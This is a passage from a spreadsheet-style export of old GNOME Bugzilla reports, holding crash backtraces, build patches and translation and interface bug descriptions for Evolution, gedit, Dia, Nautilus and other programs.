    source_url=0x824dad8 pop://jshoppa@acad.stedwards.edu/inbox 
    original_source_url=0x824dad8 pop://jshoppa@acad.stedwards.edu/inbox 
    ex=0x8250730) at camel-filter-driver.c:925
#24 0x40044c73 in camel_filter_driver_filter_folder (driver=0x823e3c8 
    folder=0x824b748 cache=0x824c780 uids=0x817cfd0 remove=1 ex=0x8250730)
    at camel-filter-driver.c:805
#25 0x08093dc9 in mail_offline_handler_get_type ()
#26 0x080942b9 in mail_filter_on_demand ()
#27 0x08092ae5 in mail_msg_wait_all ()
#28 0x400829fd in thread_received_msg (e=0x8130898 m=0x8250718)
    at e-msgport.c:469
#29 0x40082b7e in thread_dispatch (din=0x8130898) at e-msgport.c:550
#30 0x40ea7f87 in pthread_start_thread (arg=0xbf3ffc00) at manager.c:284
Thread 4 (Thread 2051 (LWP 29382)):
#0  0x40ee6966 in __sigsuspend (set=0xbf5ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40eaad61 in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:969
#2  0x40ea6ee4 in pthread_cond_wait (cond=0x8130888 mutex=0x8130868)
    at restart.h:34
#3  0x400824ce in e_msgport_wait (mp=0x8130840) at e-msgport.c:198
#4  0x40082af6 in thread_dispatch (din=0x81307f0) at e-msgport.c:517
#5  0x40ea7f87 in pthread_start_thread (arg=0xbf5ffc00) at manager.c:284
Thread 3 (Thread 1026 (LWP 29381)):
#0  0x40ee6966 in __sigsuspend (set=0xbf7ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x40eaad61 in __pthread_wait_for_restart_signal (self=0xbf7ffc00)
    at pthread.c:969
#2  0x40ea6ee4 in pthread_cond_wait (cond=0x81307e0 mutex=0x81307c0)
    at restart.h:34
#3  0x400824ce in e_msgport_wait (mp=0x8130798) at e-msgport.c:198
#4  0x40082af6 in thread_dispatch (din=0x8130748) at e-msgport.c:517
#5  0x40ea7f87 in pthread_start_thread (arg=0xbf7ffc00) at manager.c:284
Thread 2 (Thread 2049 (LWP 29380)):
#0  0x40f96c6c in __poll (fds=0x814bebc nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x40ea7d0e in __pthread_manager (arg=0x1a) at manager.c:140
Thread 1 (Thread 1024 (LWP 29357)):
#0  0x40f6be29 in __wait4 () from /lib/libc.so.6
#1  0x40fe8050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40ead8de in waitpid (pid=29388 stat_loc=0xbffff48c options=0)
    at wrapsyscall.c:172
#3  0x4091e7ae in gnome_segv_handle (signum=8) at gnome-init.c:664
#4  0x0809d5ed in message_browser_get_type ()
#5  0x40eab4c7 in pthread_sighandler (signo=8 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136558144 esi = 12 ebp = 3221223512 esp = 3221223500 ebx = 136558240 edx = 6 ecx = 12 eax = 4294967292 trapno = 0 err = 0 eip = 1090088044 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223500 ss = 43 __ssh = 0 fpstate = 0xbffff5d0 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40f96c6c in __poll (fds=0x823b640 nfds=12 timeout=49)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40e8fa74 in g_main_poll (timeout=49 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40e8f465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x40e8f7e8 in g_main_run (loop=0x80feda0) at gmain.c:935
#11 0x40bef27b in gtk_main () at gtkmain.c:524
#12 0x403de53b in bonobo_main () at bonobo-main.c:284
#13 0x0809d81d in main ()
#14 0x40ed4306 in __libc_start_main (main=0x809d638  argc=3 
    ubp_av=0xbffffaf4 init=0x8066214  fini=0x80d3630  
    rtld_fini=0x4000d2dc  stack_end=0xbffffaec)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40f6be29 in __wait4 () from /lib/libc.so.6
#0  0x40f6be29 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40fe8050 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40ead8de in waitpid (pid=29388 stat_loc=0xbffff48c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff48c
options = 0
result = 0
oldtype = 0
#3  0x4091e7ae in gnome_segv_handle (signum=8) at gnome-init.c:664
	in gnome-init.c
estatus = 1089114832
in_segv = 1
pid = 0
#4  0x0809d5ed in message_browser_get_type ()
No symbol table info available.
#5  0x40eab4c7 in pthread_sighandler (signo=8 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136558144 esi = 12 ebp = 3221223512 esp = 3221223500 ebx = 136558240 edx = 6 ecx = 12 eax = 4294967292 trapno = 0 err = 0 eip = 1090088044 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223500 ss = 43 __ssh = 0 fpstate = 0xbffff5d0 oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
self = 0x40eb4460
in_sighandler = 0x0
self = 0x40eb4460
in_sighandler = 0x0
#6  
No locals.
#7  0x40f96c6c in __poll (fds=0x823b640 nfds=12 timeout=49)
    at ../sysdeps/unix/sysv/linux/poll.c:63
	in ../sysdeps/unix/sysv/linux/poll.c
fds = (struct pollfd *) 0x823b640
nfds = 3221222540
timeout = 0
resultvar = 136558144
</t>
  </si>
  <si>
    <t>jshoppa</t>
  </si>
  <si>
    <t>GIMP-546204</t>
  </si>
  <si>
    <t>_Zoom message needs contextual separation</t>
  </si>
  <si>
    <t>Please describe the problem:
Zoom as menu item and as a type of motion blur should be translated into Russian using different words. Two patches below fix this.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>DIA-345084</t>
  </si>
  <si>
    <t>svg-export problems</t>
  </si>
  <si>
    <t>Please describe the problem:
This is not directly a bug because the generated SVG-files appear to be valid but usually i want the svg-files to be displayed in some medium e.g. a webbrowser.
There are 2 problems first is the header which causes firefox (1.5) to display the xml-data-source instead of the image.
The second is the floats it seems as though most svg-viewer-applications cannot handle floating-point-numbers therefore the images appear messed up nearly everywhere.
Solution would be to multiply all coordinates by a fixed number (such as 1000) so that there is at least a approximation.
Steps to reproduce:
1. Create a graph with elements containing text
2. Export as SVG
3. View the Graph in firefox
Actual results:
Seeing XML-tree after fixing header manually seeing a messed up picture
Expected results:
Seeing the same graph as in dia
Does this happen every time?
yes
Other information:
Only programm displaying the file correctly seems to be inkscape but it cannot fix the floating points as well.</t>
  </si>
  <si>
    <t>fritsch+bugzilla.gnome.org</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-63648</t>
  </si>
  <si>
    <t>gnome-games doesn't compile</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-games
Severity: blocker
Version: 1.4.0.3
Synopsis: gnome-games doesn't compile
Bugzilla-Product: gnome-games
Bugzilla-Component: general
Description:
Two things wrong:
1) Doesn't compile against gdk-pixbuf 0.13.0.
2) Doesn't compile against guile-1.5.4
gdk-pixbuf 0.12.0 (or thereabouts) changed it's location.
It has handily provided a --cflags option to used but gnome-games
didn't bother using it (other needed libraries should probably be
reviewed for this problem as well).
patch -p1 &lt;&lt; \EOF
diff -ru gnome-games-1.4.0.3.orig/aisleriot/cscmi.c
gnome-games-1.4.0.3/aisleriot/cscmi.c
--- gnome-games-1.4.0.3.orig/aisleriot/cscmi.c  Wed Jul 11 12:44:26
2001
+++ gnome-games-1.4.0.3/aisleriot/cscmi.c       Fri Nov  2 12:50:18
2001
@@ -1557 +1557 @@
   return SCM_EOL
 }
-SCM scm_add_slot(SCM slot) 
+SCM gg_scm_add_slot(SCM slot) 
 {
   add_slot(slot)
   return SCM_EOL
@@ -2787 +2787 @@
   gh_new_procedure1_0(set-statusbar-message
scm_set_statusbar_message)
   gh_new_procedure1_0(set-surface-layout scm_set_surface_layout)
   gh_new_procedure0_0(reset-surface scm_reset_surface)
-  gh_new_procedure1_0(add-slot scm_add_slot)
+  gh_new_procedure1_0(add-slot gg_scm_add_slot)
   gh_new_procedure1_0(get-slot scm_get_slot)  
   gh_new_procedure2_0(set-cards-c! scm_set_cards)
   gh_new_procedure2_0(set-slot-y-expansion!
scm_set_slot_y_expansion)
diff -ru gnome-games-1.4.0.3.orig/configure
gnome-games-1.4.0.3/configure
--- gnome-games-1.4.0.3.orig/configure  Wed Jul 11 13:02:11 2001
+++ gnome-games-1.4.0.3/configure       Fri Nov  2 12:35:39 2001
@@ -12707 +12707 @@
                GTKXMHTML_LIBS=`$GNOME_CONFIG --libs-only-l
gtkxmhtml`
                ZVT_LIBS=`$GNOME_CONFIG --libs-only-l zvt`
                GNOME_LIBDIR=`$GNOME_CONFIG --libs-only-L gnorba
gnomeui`
-               GNOME_INCLUDEDIR=`$GNOME_CONFIG --cflags gnorba
gnomeui`
+               GNOME_INCLUDEDIR=`$GNOME_CONFIG --cflags gnorba gnomeui
gdk_pixbuf`
              else
                echo $ac_tno 1&gt;&amp;6
EOF
The latest development version of guile provides a function called
scm_add_slot() which clashes with aisleriot/cscmi.c.
The following patch fixes the problem on *my* system.  But it may not be
sufficient to cover all cases.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-11-02 18:52 -------
The original reporter (dalgoda@ix.netcom.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-games-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GEDIT-151146</t>
  </si>
  <si>
    <t>gedit french translation error</t>
  </si>
  <si>
    <t>1. Open gedit
2. write anything
3. Save the file anywhere
4. At the bottom of the window you will be able to read (example) Le document
/home/t/pyramid.c n'a Ã©tÃ© enregistrÃ©. but we should read Le document
/home/t/pyramid.c a Ã©tÃ© enregistrÃ©. because de n' means a negation.</t>
  </si>
  <si>
    <t>RHYTHMBOX-329201</t>
  </si>
  <si>
    <t>Wrong FSF Inc. address</t>
  </si>
  <si>
    <t>Please describe the problem:
In the About-dialog the old address of the FSF Inc. is used. There should be
the new address:
Free Software Foundation Inc. 51 Franklin St Fifth Floor Boston MA 
02110-1301  USA
Steps to reproduce:
1. Start rhythmbox
2. Click Help-&gt;About
3. Click License
Actual results:
Expected results:
Does this happen every time?
yes
Other information:
This problem is also in a lot of other gnome releated packages</t>
  </si>
  <si>
    <t>heb</t>
  </si>
  <si>
    <t>EKIGA-380040</t>
  </si>
  <si>
    <t>Can not move focus onto connect toggle button with keyboard navigation.</t>
  </si>
  <si>
    <t>Please describe the problem:
This is an a11y bug for ekiga.
Steps to reproduce:
1. Launch ekiga.
2. In speed dial pad press Tab to browse the focus onto connect button.
Actual results:
The focus can not be put onto the connect button.
Expected results:
User could navigate the focus onto connect button with keyboard navigation only. 
Does this happen every time?
Yes. 
Other information:
No.</t>
  </si>
  <si>
    <t>jan.schampera</t>
  </si>
  <si>
    <t>EVOLUTION-236139</t>
  </si>
  <si>
    <t>Does edit_server_window_simple really need translation?</t>
  </si>
  <si>
    <t>#: addressbook/gui/component/ldap-config.glade.h:135
msgid edit_server_window_simple
Does this message really need translation? If not it should probably not
be marked for translation.</t>
  </si>
  <si>
    <t>DIA-172529</t>
  </si>
  <si>
    <t>Patch fixing use of setlocale() calls in dia_xml.c</t>
  </si>
  <si>
    <t>Correct handling of decimal point in dia_xml.c file is done by temporary
changing of LC_NUMERIC to 'C'. Attached patch fixes this behavior with use of
g_ascii_* functions.</t>
  </si>
  <si>
    <t>ptasz3k</t>
  </si>
  <si>
    <t>GNOME-APPLETS-372706</t>
  </si>
  <si>
    <t>invest-chart in the applications menu?</t>
  </si>
  <si>
    <t>For some reason there's an invest-char item in the applications menu. Do we really need it? I'm asking because I thought this was an applet :-)</t>
  </si>
  <si>
    <t>EPIPHANY-421060</t>
  </si>
  <si>
    <t>Progress bar should be thicker</t>
  </si>
  <si>
    <t>The new progress bar height is nicer than the previous one because it looks more consistent. However you decreased the height too much. Take Firefox progress bar as reference. It looks better.</t>
  </si>
  <si>
    <t>EVOLUTION-258427</t>
  </si>
  <si>
    <t>Tasks forwarded as iCalendar attachments are not updating properly</t>
  </si>
  <si>
    <t>Description of Problem:
When I forward a task that does not exist in the recipient's local store
and the recipient tries to update the task they get the message box:
Object is invalid and cannot be updated.  On the command line evolution
gives the output:
(evolution:16731): cal-client-CRITICAL **: file cal-client.c: line 2804
(cal_client_update_objects): assertion `client != NULL' failed
(The 16731 is replaced by the PID of evolution.)
However if the task alredy exists in the recipients local store then the
task gets updated correctly.  If you save the task out into a separate
file and then import that file then everything works fine.  One reason
why this seems strange is that I can update a calendar object that doesn't
exist just fine.
Steps to reproduce the problem:
1. Create a task in the sender's evolution.
2. Right click on the task and select Forward as iCalendar.
3. Forward the task to the recipient.
4. On the recipient's machine open the email containing the task.  Down
   towards the bottom there should be a pull-down menu with one choice of
   'update' a button that says 'OK' and a button that says
   'Tasks in Local Folders'.  Click on the 'OK' button.  Theoretically
   this should put the task into the tasks folder on the recipient's
   machine.
Actual Results:
The message box stated above appears.  Evolution also produces the
command-line ouput shown above wherever it is sending its stderr.  The task
does not appear in the Tasks folder.
Expected Results:
A message box saying Update complete should appear and the task should
appear in the Tasks folder on the recipient's machine.
How often does this happen? 
Every time that you try to update a task that does not exist on the
recipient's machine.  Since the task in the steps above was created on the
sender's machine it will happen 100% of the time in the above scenario.
Additional Information:
If a given task already exists on both the sender's and recipient's
machines (For example the sender is updating the status of an already
existing bug.) then the task gets updated correctly.</t>
  </si>
  <si>
    <t>jmubeen</t>
  </si>
  <si>
    <t>guthrie</t>
  </si>
  <si>
    <t>JHBUILD-334678</t>
  </si>
  <si>
    <t>Updating SVN modules fails for some non-English locales</t>
  </si>
  <si>
    <t>To check that the existing working tree is a subversion working tree and pointing at the right URL it runs svn info . in that directory and looks for the URL:... line in the output.
Unfortunately the URL: bit is translated.  So in Norwegian the output looks like this:
Filsti: .
Nettadresse: http://svn.galago-project.org/trunk/libnotify
Depotrot: http://svn.galago-project.org
Depotets UUID: 89c5d548-cdd1-0310-beb7-b4f31a2780fd
Revisjon: 2594
Nodetype: Katalog
Oppgave: Normal
Sist endret av: chipx86
Siste endrede revisjon: 2553
Dato for siste endring: 2006-02-05 02:18:54 +0100 (sÃ¸n 05 feb 2006)
Egenskaper er sist oppdatert: 2006-01-13 10:07:40 +0100 (fre 13 jan 2006)
This causes jhbuild to bomb out currently.
We should run svn with the environment set to the C locale so that we can reliably parse it.</t>
  </si>
  <si>
    <t>BUG-BUDDY-104777</t>
  </si>
  <si>
    <t>bug-buddy segfaults</t>
  </si>
  <si>
    <t xml:space="preserve">Package: bug-buddy
Severity: normal
Version: 2.2.0
Synopsis: bug-buddy segfaults
Bugzilla-Product: bug-buddy
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
I get a dialog saying bug-buddy has crashed due to a fatal error (Seg
fault). 
But as you notice I'm still running bug-buddy....
Steps to reproduce the problem:
1. start a bug report
2. wait for dialog
3. 
Actual Results:
Expected Results:
How often does this happen?
So far all the time. But I just installed gnome2.
I first ran bug-buddy bc I wanted to report that sawfish wasn't
registering with
gnome.
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/bug-buddy'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ew Thread 16384 (LWP 10435)]
[New Thread 32769 (LWP 10437)]
[New Thread 16386 (LWP 10438)]
(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0x407eba39 in wait4 () from /lib/libc.so.6
#0  0x407eba39 in wait4 () from /lib/libc.so.6
#1  0x4085ebc0 in sys_sigabbrev () from /lib/libc.so.6
#2  0x4028a061 in waitpid () from /lib/libpthread.so.0
#3  0x400679fa in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x4028b75a in __pthread_sighandler () from /lib/libpthread.so.0
#5  0x40778898 in sigaction () from /lib/libc.so.6
#6  0x407bb15d in free () from /lib/libc.so.6
#7  0x4062b05e in g_free () from /usr/lib/libglib-2.0.so.0
#8  0x402082ab in _gnome_vfs_job_complete () from
/usr/lib/libgnomevfs-2.so.0
#9  0x402099a9 in _gnome_vfs_job_go () from /usr/lib/libgnomevfs-2.so.0
#10 0x4021b51e in _gnome_vfs_uri_is_in_subdir ()
   from /usr/lib/libgnomevfs-2.so.0
#11 0x4021d938 in _gnome_vfs_uri_is_in_subdir ()
   from /usr/lib/libgnomevfs-2.so.0
#12 0x4021de24 in _gnome_vfs_xfer_private () from
/usr/lib/libgnomevfs-2.so.0
#13 0x402099f2 in _gnome_vfs_job_go () from /usr/lib/libgnomevfs-2.so.0
#14 0x40209c32 in _gnome_vfs_job_execute () from
/usr/lib/libgnomevfs-2.so.0
#15 0x40207b4b in _gnome_vfs_job_queue_shutdown ()
   from /usr/lib/libgnomevfs-2.so.0
#16 0x402160ce in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
#17 0x4063aee0 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
#18 0x40285d53 in pthread_start_thread () from /lib/libpthread.so.0
Thread 3 (Thread 16386 (LWP 10438)):
#0  0x407eba39 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x4085ebc0 in sys_sigabbrev () from /lib/libc.so.6
No symbol table info available.
#2  0x4028a061 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400679fa in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x4028b75a in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x40778898 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x407bb15d in free () from /lib/libc.so.6
No symbol table info available.
#7  0x4062b05e in g_free () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0x402082ab in _gnome_vfs_job_complete () from
/usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#9  0x402099a9 in _gnome_vfs_job_go () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#10 0x4021b51e in _gnome_vfs_uri_is_in_subdir ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#11 0x4021d938 in _gnome_vfs_uri_is_in_subdir ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#12 0x4021de24 in _gnome_vfs_xfer_private () from
/usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#13 0x402099f2 in _gnome_vfs_job_go () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#14 0x40209c32 in _gnome_vfs_job_execute () from
/usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#15 0x40207b4b in _gnome_vfs_job_queue_shutdown ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#16 0x402160ce in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#17 0x4063aee0 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#18 0x40285d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 32769 (LWP 10437)):
#0  0x4080e170 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40285a8e in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 16384 (LWP 10435)):
#0  0x4080e170 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40627c4f in g_main_loop_get_context () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x4062720a in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x4062790f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x4039b71f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#5  0x0804ec75 in main ()
No symbol table info available.
#6  0x407679f1 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x407eba39 in wait4 () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-01-29 23:45 -------
Reassigning to the default owner of the component bug-buddy-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GEDIT-116243</t>
  </si>
  <si>
    <t>gedit fails to compile with existing ORBit2 2.7.2</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Unknown
Package: gedit
Severity: normal
Version: GNOME2.3.3 2.3.2
Gnome distributor: GNOME.Org
Synopsis: gedit fails to compile with existing ORBit2 2.7.2
Bugzilla-Product: gedit
Bugzilla-Component: general
Bugzilla-Version: 2.3.2
Description:
Description of Problem:
Using ORBit 2.7.2 and the attendant new linc and libbonobo gedit fails
to compile.
A fix for this is to run 'make clean-generic' in the gedit
subdirectory forcing the IDL -&gt; C step to run again.  The same exact
problem was a bug in versions of epiphany prior to 0.7.2.  I'm not sure
how the Epiphany people fixed it but they did.  This is a common
problem with the new ORBit2 package.
Steps to reproduce the problem:
1. install new ORBit2 2.7.2
2. try to compile gedit
Actual Results:
Doesn't compile. :-(
Expected Results:
Wonderful editor!
How often does this happen?
100% of the time.
Additional Information:
running 'make -C gedit clean-generic' to force re-creation of the IDL
stub files works but perhaps a better solution is the same on the
Epiphany folks used?
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-06-29 02:18 -------
Reassigning to the default owner of the component maggi@athena.polito.it.
</t>
  </si>
  <si>
    <t>DRIVEL-305829</t>
  </si>
  <si>
    <t>IPv6 Proxy does not work</t>
  </si>
  <si>
    <t>Version details: 1.3.90
Distribution/Version: PLD AC
Put an IPv6 address in the gnome proxy settings and drivel will not connect
properly instead trying to connect as if it were IPv4 -- straced:
connect(16 {sa_family=AF_INET sin_port=htons(470)
sin_addr=inet_addr(0.0.7.209)} 16) = -1 EINVAL (Invalid argument)</t>
  </si>
  <si>
    <t>aredridel</t>
  </si>
  <si>
    <t>GGV-91158</t>
  </si>
  <si>
    <t>Fix for invalide desktop files</t>
  </si>
  <si>
    <t>Attached is a patch to fix the invalid desktop file.</t>
  </si>
  <si>
    <t>TOTEM-PL-PARSER-524475</t>
  </si>
  <si>
    <t>Tries to parse RCS file</t>
  </si>
  <si>
    <t>Weird</t>
  </si>
  <si>
    <t>TOTEM-352136</t>
  </si>
  <si>
    <t>unref volume pixbuf</t>
  </si>
  <si>
    <t>NAUTILUS-46254</t>
  </si>
  <si>
    <t>Display name for grouping in Folder Views category is poor</t>
  </si>
  <si>
    <t xml:space="preserve">The name Display used as the title of a grouping on the Folder Views pane in
the preferences window is poor. It conflicts with another use of Display
elsewhere as a verb which makes it impossible to localize (without some
technical trickery that we'd like to avoid). But it is poor anyway because it's
used as a noun (at least the other grouping headings are nouns) but not in the
traditional sense of Display as a computer noun.
Vera has offered to come up with a better label for this and probably for a lot
of the other text in the Preferences window as well which I will be happy to
implement.
------- Additional Comments From vera@eazel.com 2001-02-02 18:07:39 ----
Here's my suggestion: Name this group Show/Hide Options.
Also I've edited the first of the checkboxes slightly because I wasn't sure
what it meant the first time I saw it.
I'll attach a picture of my proposed version.
------- Additional Comments From vera@eazel.com 2001-02-02 18:12:07 ----
Created an attachment (id=1172)
Vera's proposed text for the Folder Views preference dialog
------- Additional Comments From vera@eazel.com 2001-02-02 18:14:11 ----
Reassigning to John... if you don't like my proposal just sent it back.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:58 -------
</t>
  </si>
  <si>
    <t>NAUTILUS-122618</t>
  </si>
  <si>
    <t>Upon deleting a file the focus jumps to the fist file in the list</t>
  </si>
  <si>
    <t>Navigating with the keyboard (arrow keys) in List View and pressing Delete
to delete file works just like it should. But when you want to navigate
further down the list (with the arrow keys) the focus is returned to the
first file in the list.
This is a problem when browsing list with many files (using the mouse to
focus the file above the just deleted file should not be nessasary ).</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-361124</t>
  </si>
  <si>
    <t>crash on exit after entry to blank contacts</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Unknown
Package: Evolution-Data-Server
Severity: Normal
Version: GNOME2.12.0 1.4.x
Gnome-Distributor: SUSE
Synopsis: crash on exit after entry to blank contacts 
Bugzilla-Product: Evolution-Data-Server
Bugzilla-Component: Contacts
Bugzilla-Version: 1.4.x
BugBuddy-GnomeVersion: 2.0 (2.12.0)
Description:
Description of the crash:
No right - try exit
Steps to reproduce the crash:
1. Enter contacts. None shown in any folder (search filter is clear)
(N.B. one e-mail window also already open).
2. This is not correct therefore try exitting.
3. Crash on exit
Expected Results:
Display contects view with all contacts present
How often does this happen?
1st time (submitting as we have debug symbols)
Additional Information:
Debugging Information:
Backtrace was generated from
'/opt/gnome/libexec/evolution-data-server-1.4'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 1085765760 (LWP 6438)]
[New Thread 1109416880 (LWP 6577)]
[Thread debugging using libthread_db enabled]
[New Thread 1085765760 (LWP 6438)]
[New Thread 1109416880 (LWP 6577)]
[Thread debugging using libthread_db enabled]
[New Thread 1085765760 (LWP 6438)]
[New Thread 1109416880 (LWP 6577)]
[New Thread 1091136432 (LWP 6494)]
0xffffe410 in ?? ()
#0  0xffffe410 in ?? ()
#1  0xbf9328bc in ?? ()
#2  0x00000000 in ?? ()
#3  0xbf9328bc in ?? ()
#4  0x40adf0cb in __waitpid_nocancel () from /lib/tls/libc.so.6
#5  0x40a87cb9 in do_system () from /lib/tls/libc.so.6
#6  0x40a88072 in system () from /lib/tls/libc.so.6
#7  0x40a4b7ad in system () from /lib/tls/libpthread.so.0
#8  0x0804b60a in gnome_segv_handler (signo=11) at server.c:109
#9  
#10 e_book_backend_file_stop_book_view (backend=0x8071128
book_view=0x804d5f4)
    at e-book-backend-file.c:660
#11 0x4003d6e2 in e_book_backend_stop_book_view (backend=0x8071128 
    book_view=0x8339a80) at e-book-backend.c:324
#12 0x40040215 in view_listener_died_cb (cnx=0x8251fd8
user_data=0x804d5f4)
    at e-data-book-view.c:55
#13 0x408ef8b1 in link_connection_unref () from
/opt/gnome/lib/libORBit-2.so.0
#14 0x408ef923 in link_connection_unref () from
/opt/gnome/lib/libORBit-2.so.0
#15 0x409a7941 in g_child_watch_add () from
/opt/gnome/lib/libglib-2.0.so.0
#16 0x409a535c in g_main_context_dispatch ()
   from /opt/gnome/lib/libglib-2.0.so.0
#17 0x409a87cb in g_main_context_check () from
/opt/gnome/lib/libglib-2.0.so.0
#18 0x409a8ae7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
#19 0x4082ec83 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#20 0x0804bd05 in main (argc=3 argv=0x805c0d0) at server.c:347
Thread 3 (Thread 1091136432 (LWP 6494)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41096388 in ?? ()
No symbol table info available.
#2  0xffffffff in ?? ()
No symbol table info available.
#3  0x0000000b in ?? ()
No symbol table info available.
#4  0x40b07482 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x409a861c in g_main_context_check () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x409a8ae7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x408eee50 in link_thread_io_context () from
/opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#8  0x0805d070 in ?? ()
No symbol table info available.
#9  0x40a03b20 in ?? () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x41096458 in ?? ()
No symbol table info available.
#11 0x409c3b61 in g_static_private_free () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#12 0x409c3b61 in g_static_private_free () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#13 0x40a45297 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#14 0x40b1137e in clone () from /lib/tls/libc.so.6
No symbol table info available.
#15 0x41096bb0 in ?? ()
No symbol table info available.
Thread 2 (Thread 1109416880 (LWP 6577)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x42205378 in ?? ()
No symbol table info available.
#2  0xffffffff in ?? ()
No symbol table info available.
#3  0x00000001 in ?? ()
No symbol table info available.
#4  0x40b07482 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x409a861c in g_main_context_check () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x409a8ae7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x40061210 in startup_mainloop (arg=0x0) at e-book.c:3727
	loop = 
#8  0x409c3b61 in g_static_private_free () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x40a45297 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#10 0x40b1137e in clone () from /lib/tls/libc.so.6
No symbol table info available.
#11 0x42205bb0 in ?? ()
No symbol table info available.
Thread 1 (Thread 1085765760 (LWP 6438)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0xbf9328bc in ?? ()
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
#3  0xbf9328bc in ?? ()
No symbol table info available.
#4  0x40adf0cb in __waitpid_nocancel () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x40a87cb9 in do_system () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x40a88072 in system () from /lib/tls/libc.so.6
No symbol table info available.
#7  0x40a4b7ad in system () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x0804b60a in gnome_segv_handler (signo=11) at server.c:109
	in_segv = 1
#9  
No symbol table info available.
#10 e_book_backend_file_stop_book_view (backend=0x8071128
book_view=0x804d5f4)
